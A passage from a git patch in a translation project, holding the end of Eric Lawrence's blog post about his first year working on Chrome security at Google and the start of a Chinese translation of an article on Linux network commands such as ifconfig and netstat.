complete dummy. I’ll ramp up. It’ll be rough, but it’ll work out. Hell, I started writing Fiddler not knowing either C# nor HTTP, and _that _turned out pretty good. I’ll buy some books and get caught up. There’s no way that Google would have just hired me as a C++ developer without asking me any C++ coding questions if it wasn’t going to all be okay. Right? Right?!?”_ - -### THE FIREHOSE - -I knew I had a lot to learn, and fast, but it took me a while to realize just how much else I didn’t know. - -Google’s primary development platform is Linux, an OS that I would install every few years, play with for a day, then forget about. My new laptop was a Mac, a platform I’d used a bit more, but still one for which I was about a twentieth as proficient as I was on Windows. The Chrome Windows team made a half-hearted attempt to get me to join their merry band, but warned me honestly that some of the tooling wasn’t quite as good as it was on Linux and it’d probably be harder for me to get help. So I tried to avoid Windows for the first few months, ordering a puny Windows machine that took around four times longer to build Chrome than my obscenely powerful Linux box (with its 48 logical cores). After a few months, I gave up on trying to avoid Windows and started using it as my primary platform. I was more productive, but incredibly slow builds remained a problem for a few months. Everyone told me to just order _another_ obscenely powerful box to put next to my Linux one, but it felt wrong to have hardware at my desk that collectively cost more than my first car—especially when, at Microsoft, I bought all my own hardware. I eventually mentioned my cost/productivity dilemma to a manager, who noted I was getting paid a Google engineer’s salary and then politely asked me if I was just really terrible at math. I ordered a beastly Windows machine and now my builds scream. (To the extent that _any_ C++ builds can scream, of course. At Telerik, I was horrified when a full build of Fiddler slowed to a full 5 seconds on my puny Windows machine; my typical Chrome build today still takes about 15 minutes.) - -Beyond learning different operating systems, I’d never used Google’s apps before (Docs/Sheets/Slides); luckily, I found these easy to pick up, although I still haven’t fully figured out how Google Drive file organization works. Google Docs, in particular, is so good that I’ve pretty much given up on Microsoft Word (which headed downhill after the 2010 version). Google Keep is a low-powered alternative to OneNote (which is, as far as I can tell, banned because it syncs to Microsoft servers) and I haven’t managed to get it to work well for my needs. Google Plus still hasn’t figured out how to support pasting of images via CTRL+V, a baffling limitation for something meant to compete in the space… hell, even _Microsoft Yammer _supports that, for gods sake. The only real downside to the web apps is that tab/window management on modern browsers is still a very much unsolved problem (but more on that in a bit). - -But these speedbumps all pale in comparison to Gmail. Oh, Gmail. As a program manager at Microsoft, pretty much your _entire life _is in your inbox. After twelve years with Outlook and Exchange, switching to Gmail was a train wreck. “_What do you mean, there aren’t folders? How do I mark this message as low priority? Where’s the button to format text with strikethrough? What do you mean, I can’t drag an email to my calendar? What the hell does this Archive thing do? Where’s that message I was just looking at? Hell, where did my Gmail tab even go—it got lost in a pile of sixty other tabs across four top-level Chrome windows. WTH??? How does anyone get anything done?”_ - -### COMMUNICATION AND REMOTE WORK - -While Telerik had an office in Austin, I didn’t interact with other employees very often, and when I did they were usually in other offices. I thought I had a handle on remote work, but I really didn’t. Working with a remote team on a daily basis is just _different_. - -With communication happening over mail, IRC, Hangouts, bugs, document markup comments, GVC (video conferencing), G+, and discussion lists, it was often hard to [figure out which mechanisms to use][8], let alone which recipients to target. Undocumented pitfalls abounded (many discussion groups were essentially abandoned while others were unexpectedly broad; turning on chat history was deemed a “no-no” for document retention reasons). - -It often it took a bit of research to even understand who various communication participants were and how they related to the projects at hand. - -After years of email culture at Microsoft, I grew accustomed to a particular style of email, and Google’s is just _different._ Mail threads were long, with frequent additions of new recipients and many terse remarks. Many times, I’d reply privately to someone on a side thread, with a clarifying question, or suggesting a counterpoint to something they said. The response was often “_Hey, this just went to me. Mind adding on the main thread?_” - -I’m working remotely, with peers around the world, so real-time communication with my team is essential. Some Chrome subteams use Hangouts, but the Security team largely uses IRC. - -[ - ![XKCD comic on IRC](https://textplain.files.wordpress.com/2017/01/image30.png?w=1320&h=560 "https://xkcd.com/1782/") -][9] - -Now, I’ve been chatting with people online since BBSes were a thing (I’ve got a five digit ICQ number somewhere), but my knowledge of IRC was limited to the fact that it was a common way of taking over suckers’ machines with buffer overflows in the ‘90s. My new teammates tried to explain how to IRC repeatedly: “_Oh, it’s easy, you just get this console IRC client. No, no, you don’t run it on your own workstation, that’d be crazy. You wouldn’t have history! You provision a persistent remote VM on a machine in Google’s cloud, then SSH to that, then you run screens and then you run your IRC client in that. Easy peasy._” - -Getting onto IRC remained on my “TODO” list for five months before I finally said “F- it”, installed [HexChat][10] on my Windows box, disabled automatic sleep, and called it done. It’s worked fairly well. - -### GOOGLE DEVELOPER TOOLING - -When an engineer first joins Google, they start with a week or two of technical training on the Google infrastructure. I’ve worked in software development for nearly two decades, and I’ve never even dreamed of the development environment Google engineers get to use. I felt like Charlie Bucket on his tour of Willa Wonka’s Chocolate Factory—astonished by the amazing and unbelievable goodies available at any turn. The computing infrastructure was something out of Star Trek, the development tools were slick and amazing, the _process_ was jaw-dropping. - -While I was doing a “hello world” coding exercise in Google’s environment, a former colleague from the IE team pinged me on Hangouts chat, probably because he’d seen my tweets about feeling like an imposter as a SWE.  He sent me a link to click, which I did. Code from Google’s core advertising engine appeared in my browser. Google’s engineers have access to nearly all of the code across the whole company. This alone was astonishing—in contrast, I’d initially joined the IE team so I could get access to the networking code to figure out why the Office Online team’s website wasn’t working. “Neat, I can see everything!” I typed back. “Push the Analyze button” he instructed. I did, and some sort of automated analyzer emitted a report identifying a few dozen performance bugs in the code. “Wow, that’s amazing!” I gushed. “Now, push the Fix button” he instructed. “Uh, this isn’t some sort of security red team exercise, right?” I asked. He assured me that it wasn’t. I pushed the button. The code changed to fix some unnecessary object copies. “Amazing!” I effused. “Click Submit” he instructed. I did, and watched as the system compiled the code in the cloud, determined which tests to run, and ran them. Later that afternoon, an owner of the code in the affected folder typed LGTM (Googlers approve changes by typing the acronym for Looks Good To Me) on the change list I had submitted, and my change was live in production later that day. I was, in a word, gobsmacked. That night, I searched the entire codebase for [misuse][11] of an IE cache control token and proposed fixes for the instances I found. I also narcissistically searched for my own name and found a bunch of references to blog posts I’d written about assorted web development topics. - -Unfortunately for Chrome Engineers, the introduction to Google’s infrastructure is followed by a major letdown—because Chromium is open-source, the Chrome team itself doesn’t get to take advantage of most of Google’s internal goodies. Development of Chrome instead resembles C++ development at most major companies, albeit with an automatically deployed toolchain and enhancements like a web-based code review tool and some super-useful scripts. The most amazing of these is called [bisect-builds][12], and it allows a developer to very quickly discover what build of Chrome introduced a particular bug. You just give it a “known good” build number and a “known bad” build number and it  automatically downloads and runs the minimal number of builds to perform a binary search for the build that introduced a given bug: - - ![Console showing bisect builds running](https://textplain.files.wordpress.com/2017/01/image31.png?w=1320&h=514 "Binary searching for regressions") - -Firefox has [a similar system][13], but I’d’ve killed for something like this back when I was reproducing and reducing bugs in IE. While it’s easy to understand how the system functions, it works so well that it feels like magic. Other useful scripts include the presubmit checks that run on each change list before you submit them for code review—they find and flag various style violations and other problems. - -Compilation itself typically uses a local compiler; on Windows, we use the MSVC command line compiler from Visual Studio 2015 Update 3, although work is underway to switch over to [Clang][14]. Compilation and linking all of Chrome takes quite some time, although on my new beastly dev boxes it’s not _too_ bad. Googlers do have one special perk—we can use Goma (a distributed compiler system that runs on Google’s amazing internal cloud) but I haven’t taken advantage of that so far. - -For bug tracking, Chrome recently moved to [Monorail][15], a straightforward web-based bug tracking system. It works fairly well, although it is somewhat more cumbersome than it needs to be and would be much improved with [a few tweaks][16]. Monorail is open-source, but I haven’t committed to it myself yet. - -For code review, Chrome presently uses [Rietveld][17], a web-based system, but this is slated to change in the near(ish) future. Like Monorail, it’s pretty straightforward although it would benefit from some minor usability tweaks; I committed one trivial change myself, but the pending migration to a different system means that it isn’t likely to see further improvements. - -As an open-source project, Chromium has quite a bit of public [documentation for developers][18], including [Design Documents][19]. Unfortunately, Chrome moves so fast that many of the design documents are out-of-date, and it’s not always obvious what’s current and what was replaced long ago. The team does _value_ engineers’ investment in the documents, however, and various efforts are underway to update the documents and reduce Chrome’s overall architectural complexity. I expect these will be ongoing battles forever, just like in any significant active project. - -### WHAT I’VE DONE - -“That’s all well and good,” my reader asks, “but _what have you done_ in the last year?” - -### I WROTE SOME CODE - -My first check in to Chrome [landed][20] in February; it was a simple adjustment to limit Public-Key-Pins to 60 days. Assorted other checkins trickled in through the spring before I went on paternity leave. The most _fun_ fix I did cleaned up a tiny [UX glitch][21] that sat unnoticed in Chrome for almost a decade; it was mostly interesting because it was a minor thing that I’d tripped over for years, including back in IE. (The root cause was arguably that MSDN documentation about DWM lied; I fixed the bug in Chrome, sent the fix to IE, and asked MSDN to fix their docs). - -I fixed a number of [minor][22] [security][23] [bugs][24], and lately I’ve been working on [UX issues][25] related to Chrome’s HTTPS user-experience. Back in 2005, I wrote [a blog post][26] complaining about websites using HTTPS incorrectly, and now, just over a decade later, Chrome and Firefox are launching UI changes to warn users when a site is collecting sensitive information on pages which are Not Secure; I’m delighted to have a small part in those changes. - -Having written a handful of Internet Explorer Extensions in the past, I was excited to discover the joy of writing Chrome extensions. Chrome extensions are fun, simple, and powerful, and there’s none of the complexity and crashes of COM. - -[ - ![My 3 Chrome Extensions](https://textplain.files.wordpress.com/2017/01/image201.png?w=1288&h=650 "My 3 Chrome Extensions") -][27] - -My first and most significant extension is the moarTLS Analyzer– it’s related to my HTTPS work at Google and it’s proven very useful in discovering sites that could improve their security. I [blogged about it][28] and the process of [developing it][29] last year. - -Because I run several different Chrome instances on my PC (and they update daily or weekly), I found myself constantly needing to look up the Chrome version number for bug reports and the like. I wrote a tiny extension that shows the version number in a button on the toolbar (so it’s captured in screenshots too!): - - ![Show Chrome Version screenshot](https://textplain.files.wordpress.com/2017/02/image.png?w=886&h=326 "Show Chrome Version") - -More than once, I spent an hour or so trying to reproduce and reduce a bug that had been filed against Chrome. When I found out the cause, I’d jubilently add my notes to the issue in the Monorail bug tracker, click “Save changes” and discover that someone more familiar with the space had beaten me to the punch and figured it out while I’d had the bug open on my screen. Adding an “Issue has been updated” alert to the bug tracker itself seemed like the right way to go, but it would require some changes that I wasn’t able to commit on my own. So, instead I built an extension that provides such alerts within the page until the [feature][30] can be added to the tracker itself. - -Each of these extensions was a joy to write. - -### I FILED SOME BUGS - -I’m a diligent self-hoster, and I run Chrome Canary builds on all of my devices. I submit crash reports and [file bugs][31] with as much information as I can. My proudest moment was in helping narrow down a bizarre and intermittent problem users had with Chrome on Windows 10, where Chrome tabs would crash on every startup until you rebooted the OS. My [blog post][32] explains the full story, and encourages others to file bugs as they encounter them. - -### I TRIAGED MORE BUGS - -I’ve been developing software for Windows for just over two decades, and inevitably I’ve learned quite a bit about it, including the undocumented bits. That’s given me a leg up in understanding bugs in the Windows code. Some of the most fun include issues in Drag and Drop, like this [gem][33] of a bug that means that you can’t drop files from Chrome to most applications in Windows. More meaningful [bugs][34] [relate][35] [to][36] [problems][37] with Windows’ Mark-of-the-Web security feature (about which I’ve [blogged][38] [about][39] [several][40] times). - -### I TOOK SHERIFF ROTATIONS - -Google teams have the notion of sheriffs—a rotating assignment that ensures that important tasks (like triaging incoming security bugs) always has a defined owner, without overwhelming any single person. Each Sheriff has a term of ~1 week where they take on additional duties beyond their day-to-day coding, designing, testing, etc. - -The Sheriff system has some real benefits—perhaps the most important of which is creating a broad swath of people experienced and qualified in making triage decisions around security vulnerabilities. The alternative is to leave such tasks to a single owner, rapidly increasing their [bus factor][41] and thus the risk to the project. (I know this from first-hand experience. After IE8 shipped, I was on my way out the door to join another team. Then IE’s Security PM left, leaving a gaping hole that I felt obliged to stay around to fill. It worked out okay for me and the team, but it was tense all around.) - -I’m on two sheriff rotations: [Enamel][42] (my subteam) and the broader Chrome Security Sheriff. - -The Enamel rotation’s tasks are akin to what I used to do as a Program Manager at Microsoft—triage incoming bugs, respond to questions in the [Help Forums][43], and generally act as a point of contact for my immediate team. - -In contrast, the Security Sheriff rotation is more work, and somewhat more exciting. The Security Sheriff’s [duties][44] include triaging all bugs of type “Security”, assigning priority, severity, and finding an owner for each. Most security bugs are automatically reported by [our fuzzers][45] (a tireless robot army!), but we also get reports from the public and from Chrome team members and [Project Zero][46] too. - -At Microsoft, incoming security bug reports were first received and evaluated by the Microsoft Security Response Center (MSRC); valid reports were passed along to the IE team after some level of analysis and reproduction was undertaken. In general, all communication was done through MSRC, and the turnaround cycle on bugs was _typically _on the order of weeks to months. - -In contrast, anyone can [file a security bug][47] against Chrome, and every week lots of people do. One reason for that is that Chrome has a [Vulnerability Rewards program][48] which pays out up to $100K for reports of vulnerabilities in Chrome and Chrome OS. Chrome paid out just under $1M USD in bounties [last year][49]. This is an _awesome _incentive for researchers to responsibly disclose bugs directly to us, and the bounties are _much _higher than those of nearly any other project. - -In his “[Hacker Quantified Security][50]” talk at the O’Reilly Security conference, HackerOne CTO and Cofounder Alex Rice showed the following chart of bounty payout size for vulnerabilities when explaining why he was using a Chromebook. Apologies for the blurry photo, but the line at the top shows Chrome OS, with the 90th percentile line miles below as severity rises to Critical: - -[ - ![Vulnerability rewards by percentile. Chrome is WAY off the chart.](https://textplain.files.wordpress.com/2017/01/image_thumb6.png?w=962&h=622 "Chrome Vulnerability Rewards are Yuuuuge") -][51] - -With a top bounty of $100000 for an exploit or exploit chain that fully compromises a Chromebook, researchers are much more likely to send their bugs to us than to try to find a buyer on the black market. - -Bug bounties are great, except when they’re not. Unfortunately, many filers don’t bother to read the [Chrome Security FAQ][52] which explains what constitutes a security vulnerability and the great many things that do not. Nearly every week, we have at least one person (and often more) file a bug noting “_I can use the Developer Tools to read my own password out of a webpage. Can I have a bounty?_” or “_If I install malware on my PC, I can see what happens inside Chrome” _or variations of these. - -Because we take security bug reports very seriously, we often spend a lot of time on what seem like garbage filings to verify that there’s not just some sort of communication problem. This exposes one downside of the sheriff process—the lack of continuity from week to week. - -In the fall, we had one bug reporter file a new issue every week that was just a collection of security related terms (XSS! CSRF! UAF! EoP! Dangling Pointer! Script Injection!) lightly wrapped in prose, including screenshots, snippets from websites, console output from developer tools, and the like. Each week, the sheriff would investigate, ask for more information, and engage in a fruitless back and forth with the filer trying to figure out what claim was being made. Eventually I caught on to what was happening and started monitoring the sheriff’s queue, triaging the new findings directly and sparing the sheriff of the week. But even today we still catch folks who lookup old bug reports (usually Won’t Fixed issues), copy/paste the content into new bugs, and file them into the queue. It’s frustrating, but coming from a closed bug database, I’d choose the openness of the Chrome bug database every time. - -Getting ready for my first Sherriff rotation, I started watching the incoming queue a few months earlier and felt ready for my first rotation in September. Day One was quiet, with a few small issues found by fuzzers and one or two junk reports from the public which I triaged away with pointers to the “_Why isn’t a vulnerability_” entries in the Security FAQ. I spent the rest of the day writing a fix for a lower-priority security [bug][53] that had been filed a month before. A pretty successful day, I thought. - -Day Two was more interesting. Scanning the queue, I saw a few more fuzzer issues and [one external report][54] whose text started with “Here is a Chrome OS exploit chain.” The report was about two pages long, and had a forty-two page PDF attachment explaining the four exploits the finder had used to take over a fully-patched Chromebook. - - ![Star Wars trench run photo](https://textplain.files.wordpress.com/2017/02/image1.png?w=478&h=244 "Defenses can't keep up!") - -Watching Luke’s X-wing take out the Death Star in Star Wars was no more exciting than reading the PDF’s tale of how a single byte memory overwrite in the DNS resolver code could weave its way through the many-layered security features of the Chromebook and achieve a full compromise. It was like the most amazing magic trick you’ve ever seen. - -I hopped over to IRC. “So, do we see full compromises of Chrome OS every week?” I asked innocently. - -“No. Why?” came the reply from several corners. I pasted in the bug link and a few moments later the replies started flowing in “OMG. Amazing!” Even guys from Project Zero were impressed, and they’re magicians who build exploits like this (usually for other products) all the time. The researcher had found one small bug and a variety of neglected components that were thought to be unreachable and put together a deadly chain. - -The first patches were out for code review that evening, and by the next day, we’d reached out to the open-source owner of the DNS component with the 1-byte overwrite bug so he could release patches for the other projects using his code. Within a few days, fixes to other components landed and had been ported to all of the supported versions of Chrome OS. Two weeks later, the Chrome Vulnerability rewards team added the [reward-100000][55] tag, the only bug so far to be so marked. Four weeks after that, I had to hold my tongue when Alex mentioned that “no one’s ever claimed that $100000 bounty” during his “Hacker Quantified Security” talk. Just under 90 days from filing, the bug was unrestricted and made available for public viewing. - -The remainder of my first Sheriff rotation was considerably less exciting, although still interesting. I spent some time looking through the components the researcher had abused in his exploit chain and filed a few bugs. Ultimately, the most risky component he used was removed entirely. - -### OUTREACH AND BLOGGING - -Beyond working on the Enamel team (focused on Chrome’s security UI surface), I also work on the “MoarTLS” project, designed to help encourage and assist the web as a whole in moving to HTTPS. This takes a number of forms—I help maintain the [HTTPS on Top Sites Report Card][56], I do consultations and HTTPS Audits with major sites as they enable HTTPS on their sites. I discover, reduce, and file bugs on Chrome’s and other browsers’ support of features like Upgrade-Insecure-Requests. I publish a [running list of articles][57] on why and how sites should enable TLS. I hassle teams all over Google (and the web in general) to enable HTTPS on every single hyperlink they emit. I responsibly disclosed security bugs in a number of products and sites, including [a vulnerability][58] in Hillary Clinton’s fundraising emails. I worked to send a notification to many many many thousands of sites collecting user information non-securely, warning them of the [UI changes in Chrome 56][59]. - -When I applied to Google for the Developer Advocate role, I expected I’d be delivering public talks _constantly_, but as a SWE I’ve only given a few talks, including my  [Migrating to HTTPS talk][60] at the first O’Reilly Security Conference. I had a lot of fun at that conference, catching up with old friends from the security community (mostly ex-Microsofties). I also went to my first [Chrome Dev Summit][61], where I didn’t have a public talk (my colleagues did) but I did get to talk to some major companies about deploying HTTPS. - -I also blogged [quite a bit][62]. At Microsoft, I started blogging because I got tired of repeating myself, and because our Exchange server and document retention policies had started making it hard or impossible to find old responses—I figured “Well, if I publish everything on the web, Google will find it, and Internet Archive will back it up.” - -I’ve kept blogging since leaving Microsoft, and I’m happy that I have even though my reader count numbers are much lower than they were at Microsoft. I’ve managed to mostly avoid trouble, although my posts are not entirely uncontroversial. At Microsoft, they wouldn’t let me publish [this post][63] (because it was too frank); in my first month at Google, I got a phone call at home (during the first portion of my paternity leave) from a Google Director complaining that I’d written [something][64] that was too harsh about a change Microsoft had made. But for the most part, my blogging seems not to ruffle too many feathers. - -### TIDBITS - -* Food at Google is generally _really _good; I’m at a satellite office in Austin, so the selection is much smaller than on the main campuses, but the rotating menu is fairly broad and always has at least three major options. And the breakfasts! I gained about 15 pounds in my first few months, but my pneumonia took it off and I’ve restrained my intake since I came back. -* At Microsoft, I always sneered at companies offering free food (“I’m an adult professional. I can pay for my lunch.”), but it’s definitely convenient to not have to hassle with payments. And until the government closes the loophole, it’s a way to increase employees’ compensation without getting taxed. -* For the first three months, I was impressed and slightly annoyed that all of the snack options in Google’s micro-kitchens are healthy (e.g. fruit)—probably a good thing, since I sit about twenty feet from one. Then I saw someone open a drawer and pull out some M&Ms, and I learned the secret—all of the junk food is in drawers. The selection is impressive and ranges from the popular to the high end. -* Google makes heavy use of the “open-office concept.” I think this makes sense for some teams, but it’s not at all awesome for me. I’d gladly take a 10% salary cut for a private office. I doubt I’m alone. -* Coworkers at Google range from very smart to insanely off-the-scales-smart. Yet, almost all of them are humble, approachable, and kind. -* Google, like Microsoft, offers gift matching for charities. This is an awesome perk, and one I aim to max out every year. I’m awed by people who go [far][1] beyond that. -* **Window Management – **I mentioned earlier that one downside of web-based tools is that it’s hard to even _find _the right tab when I’ve got dozens of open tabs that I’m flipping between. The [Quick Tabs extension][2] is one great mitigation; it shows your tabs in a searchable, most-recently-used list in a convenient dropdown: - -[ - ![QuickTabs Extension](https://textplain.files.wordpress.com/2017/01/image59.png?w=526&h=376 "A Searchable MRU of open tabs. Yes please!") -][65] - -Another trick that I learned just this month is that you can instruct Chrome to open a site in “App” mode, where it runs in its own top-level window (with no other tabs), showing the site’s icon as the icon in the Windows taskbar. It’s easy: - -On Windows, run chrome.exe –app=https://mail.google.com - -While on OS X, run open -n -b com.google.Chrome –args –app=’[https://news.google.com][66]‘ - -_Tip: The easy way to create a shortcut to a the current page in app mode is to click the Chrome Menu > More Tools > Add to {shelf/desktop} and tick the Open as Window checkbox._ - -I now have [SlickRun][67] MagicWords set up for **mail**, **calendar**, and my other critical applications. - --------------------------------------------------------------------------------- - -via: https://textslashplain.com/2017/02/01/google-chrome-one-year-in/ - -作者:[ericlaw][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://textslashplain.com/author/ericlaw1979/ -[1]:https://www.jefftk.com/p/leaving-google-joining-wave -[2]:https://chrome.google.com/webstore/detail/quick-tabs/jnjfeinjfmenlddahdjdmgpbokiacbbb -[3]:https://textslashplain.com/2015/12/23/my-next-adventure/ -[4]:http://sdtimes.com/telerik-acquires-fiddler-debugger-along-with-its-creator/ -[5]:https://bayden.com/dl/Codemash2015-ericlaw-https-in-2015.pptx -[6]:https://conferences.oreilly.com/velocity/devops-web-performance-2015/public/content/2015/04/16-https-stands-for-user-experience -[7]:https://textslashplain.com/2015/04/09/on-appreciation/ -[8]:https://xkcd.com/1254/ -[9]:http://m.xkcd.com/1782/ -[10]:https://hexchat.github.io/ -[11]:https://blogs.msdn.microsoft.com/ieinternals/2009/07/20/internet-explorers-cache-control-extensions/ -[12]:https://www.chromium.org/developers/bisect-builds-py -[13]:https://mozilla.github.io/mozregression/ -[14]:https://chromium.googlesource.com/chromium/src/+/lkgr/docs/clang.md -[15]:https://bugs.chromium.org/p/monorail/adminIntro -[16]:https://bugs.chromium.org/p/monorail/issues/list?can=2&q=reporter%3Aelawrence -[17]:https://en.wikipedia.org/wiki/Rietveld_(software) -[18]:https://www.chromium.org/developers -[19]:https://www.chromium.org/developers/design-documents -[20]:https://codereview.chromium.org/1733973004/ -[21]:https://codereview.chromium.org/2244263002/ -[22]:https://codereview.chromium.org/2323273003/ -[23]:https://codereview.chromium.org/2368593002/ -[24]:https://codereview.chromium.org/2347923002/ -[25]:https://codereview.chromium.org/search?closed=1&owner=elawrence&reviewer=&cc=&repo_guid=&base=&project=&private=1&commit=1&created_before=&created_after=&modified_before=&modified_after=&order=&format=html&keys_only=False&with_messages=False&cursor=&limit=30 -[26]:https://blogs.msdn.microsoft.com/ie/2005/04/20/tls-and-ssl-in-the-real-world/ -[27]:https://chrome.google.com/webstore/search/bayden?hl=en-US&_category=extensions -[28]:https://textslashplain.com/2016/03/17/seek-and-destroy-non-secure-references-using-the-moartls-analyzer/ -[29]:https://textslashplain.com/2016/03/18/building-the-moartls-analyzer/ -[30]:https://bugs.chromium.org/p/monorail/issues/detail?id=1739 -[31]:https://bugs.chromium.org/p/chromium/issues/list?can=1&q=reporter%3Ame&colspec=ID+Pri+M+Stars+ReleaseBlock+Component+Status+Owner+Summary+OS+Modified&x=m&y=releaseblock&cells=ids -[32]:https://textslashplain.com/2016/08/18/file-the-bug/ -[33]:https://bugs.chromium.org/p/chromium/issues/detail?id=540547 -[34]:https://bugs.chromium.org/p/chromium/issues/detail?id=601538 -[35]:https://bugs.chromium.org/p/chromium/issues/detail?id=595844#c6 -[36]:https://bugs.chromium.org/p/chromium/issues/detail?id=629637 -[37]:https://bugs.chromium.org/p/chromium/issues/detail?id=591343 -[38]:https://textslashplain.com/2016/04/04/downloads-and-the-mark-of-the-web/ -[39]:https://blogs.msdn.microsoft.com/ieinternals/2011/03/23/understanding-local-machine-zone-lockdown/ -[40]:https://blogs.msdn.microsoft.com/ieinternals/2012/06/19/enhanced-protected-mode-and-local-files/ -[41]:https://en.wikipedia.org/wiki/Bus_factor -[42]:https://www.chromium.org/Home/chromium-security/enamel -[43]:https://productforums.google.com/forum/#!forum/chrome -[44]:https://www.chromium.org/Home/chromium-security/security-sheriff -[45]:https://blog.chromium.org/2012/04/fuzzing-for-security.html -[46]:https://en.wikipedia.org/wiki/Project_Zero_(Google) -[47]:https://bugs.chromium.org/p/chromium/issues/entry?template=Security%20Bug -[48]:https://www.google.com/about/appsecurity/chrome-rewards/ -[49]:https://security.googleblog.com/2017/01/vulnerability-rewards-program-2016-year.html -[50]:https://conferences.oreilly.com/security/network-data-security-ny/public/schedule/detail/53296 -[51]:https://textplain.files.wordpress.com/2017/01/image58.png -[52]:https://dev.chromium.org/Home/chromium-security/security-faq -[53]:https://bugs.chromium.org/p/chromium/issues/detail?id=639126#c11 -[54]:https://bugs.chromium.org/p/chromium/issues/detail?id=648971 -[55]:https://bugs.chromium.org/p/chromium/issues/list?can=1&q=label%3Areward-100000&colspec=ID+Pri+M+Stars+ReleaseBlock+Component+Status+Owner+Summary+OS+Modified&x=m&y=releaseblock&cells=ids -[56]:https://www.google.com/transparencyreport/https/grid/?hl=en -[57]:https://whytls.com/ -[58]:https://textslashplain.com/2016/09/22/use-https-for-all-inbound-links/ -[59]:https://security.googleblog.com/2016/09/moving-towards-more-secure-web.html -[60]:https://www.safaribooksonline.com/library/view/the-oreilly-security/9781491960035/video287622.html -[61]:https://developer.chrome.com/devsummit/ -[62]:https://textslashplain.com/2016/ -[63]:https://blogs.msdn.microsoft.com/ieinternals/2013/10/16/strict-p3p-validation/ -[64]:https://textslashplain.com/2016/01/20/putting-users-first/ -[65]:https://chrome.google.com/webstore/detail/quick-tabs/jnjfeinjfmenlddahdjdmgpbokiacbbb -[66]:https://news.google.com/ -[67]:https://bayden.com/slickrun/ From 2090f9d9dd5f0b1956c50ee079851e169bb68d16 Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 30 Nov 2017 08:46:12 +0800 Subject: [PATCH 0080/1627] translated --- ...ng network connections on Linux systems.md | 62 +++++++++---------- 1 file changed, 30 insertions(+), 32 deletions(-) rename {sources => translated}/tech/20171009 Examining network connections on Linux systems.md (62%) diff --git a/sources/tech/20171009 Examining network connections on Linux systems.md b/translated/tech/20171009 Examining network connections on Linux systems.md similarity index 62% rename from sources/tech/20171009 Examining network connections on Linux systems.md rename to translated/tech/20171009 Examining network connections on Linux systems.md index 1a9c617503..7fc95738e9 100644 --- a/sources/tech/20171009 Examining network connections on Linux systems.md +++ b/translated/tech/20171009 Examining network connections on Linux systems.md @@ -1,24 +1,21 @@ -translating---geekpi - - -Examining network connections on Linux systems +检查 Linux 系统上的网络连接 ============================================================ -### Linux systems provide a lot of useful commands for reviewing network configuration and connections. Here's a look at a few, including ifquery, ifup, ifdown and ifconfig. +### Linux 系统提供了许多有用的命令来检查网络配置和连接。下面来看几个,包括 ifquery、ifup、ifdown 和 ifconfig。 -There are a lot of commands available on Linux for looking at network settings and connections. In today's post, we're going to run through some very handy commands and see how they work. +Linux 上有许多可用于查看网络设置和连接的命令。在今天的文章中,我们将会通过一些非常方便的命令来看看它们是如何工作的。 -### ifquery command +### ifquery 命令 -One very useful command is the **ifquery** command. This command should give you a quick list of network interfaces. However, you might only see something like this —showing only the loopback interface: +一个非常有用的命令是 **ifquery**。这个命令应该会显示一个网络接口列表。但是,你可能只会看到类似这样的内容 - 仅显示回环接口: ``` $ ifquery --list lo ``` -If this is the case, your **/etc/network/interfaces** file doesn't include information on network interfaces except for the loopback interface. You can add lines like the last two in the example below — assuming DHCP is used to assign addresses — if you'd like it to be more useful. +如果是这种情况,那么你的 **/etc/network/interfaces** 不包括除了回环接口之外的网络接口信息。在下面的例子中,假设你使用 DHCP 来分配地址,且如果你希望它更有用的话,你可以添加例子最后的两行。 ``` # interfaces(5) file used by ifup(8) and ifdown(8) @@ -28,15 +25,16 @@ auto eth0 iface eth0 inet dhcp ``` -### ifup and ifdown commands +### ifup 和 ifdown 命令 + +可以使用相关的 **ifup** 和 **ifdown** 命令来打开网络连接并根据需要将其关闭,只要该文件具有所需的描述性数据即可。请记住,“if” 在这里意思是“接口” (interface),这与 **ifconfig** 命令中的一样,而不是“如果我只有一个大脑” (if I only had a brain) 中的 “if”。 -The related **ifup** and **ifdown** commands can be used to bring network connections up and shut them down as needed provided this file has the required descriptive data. Just keep in mind that "if" means "interface" in these commands just as it does in the **ifconfig** command, not "if" as in "if I only had a brain". -### ifconfig command +### ifconfig 命令 -The **ifconfig** command, on the other hand, doesn't read the /etc/network/interfaces file at all and still provides quite a bit of useful information on network interfaces -- configuration data along with packet counts that tell you how busy each interface has been. The ifconfig command can also be used to shut down and restart network interfaces (e.g., ifconfig eth0 down). +另外,**ifconfig** 命令完全不读取 /etc/network/interfaces,但是在网络接口上仍然提供了相当多的有用信息 - 配置数据以及数据包计数可以告诉你每个接口有多忙。ifconfig 命令也可用于关闭和重新启动网络接口(例如:ifconfig eth0 down)。 ``` $ ifconfig eth0 @@ -51,13 +49,13 @@ eth0 Link encap:Ethernet HWaddr 00:1e:4f:c8:43:fc Interrupt:21 Memory:fe9e0000-fea00000 ``` -The RX and TX packet counts in this output are extremely low. In addition, no errors or packet collisions have been reported. The **uptime** command will likely confirm that this system has only recently been rebooted. +输出中的 RX 和 TX 数据包计数很低。此外,没有报告错误或数据包冲突。**uptime** 命令可能会确认此系统最近才重新启动。 -The broadcast (Bcast) and network mask (Mask) addresses shown above indicate that the system is operating on a Class C equivalent network (the default) so local addresses will range from 192.168.0.1 to 192.168.0.254. +上面显示的广播 (Bcast) 和网络掩码 (Mask) 地址表明系统运行在 C 类等效网络(默认)上,所以本地地址范围从 192.168.0.1 到 192.168.0.254。 -### netstat command +### netstat 命令 -The **netstat** command provides information on routing and network connections. The **netstat -rn** command displays the system's routing table. +**netstat** 命令提供有关路由和网络连接的信息。**netstat -rn** 命令显示系统的路由表。 @@ -70,7 +68,7 @@ Destination Gateway Genmask Flags MSS Window irtt Iface 192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 ``` -That **169.254.0.0** entry in the above output is only necessary if you are using or planning to use link-local communications. You can comment out the related lines in the **/etc/network/if-up.d/avahi-autoipd** file like this if this is not the case: +上面输出中的 **169.254.0.0** 条目仅在你正在使用或计划使用本地链路通信时才有必要。如果不是这样的话,你可以在 **/etc/network/if-up.d/avahi-autoipd** 中注释掉相关的行: ``` $ tail -12 /etc/network/if-up.d/avahi-autoipd @@ -87,9 +85,9 @@ $ tail -12 /etc/network/if-up.d/avahi-autoipd #fi ``` -### netstat -a command +### netstat -a 命令 -The **netstat -a** command will display  **_all_**  network connections. To 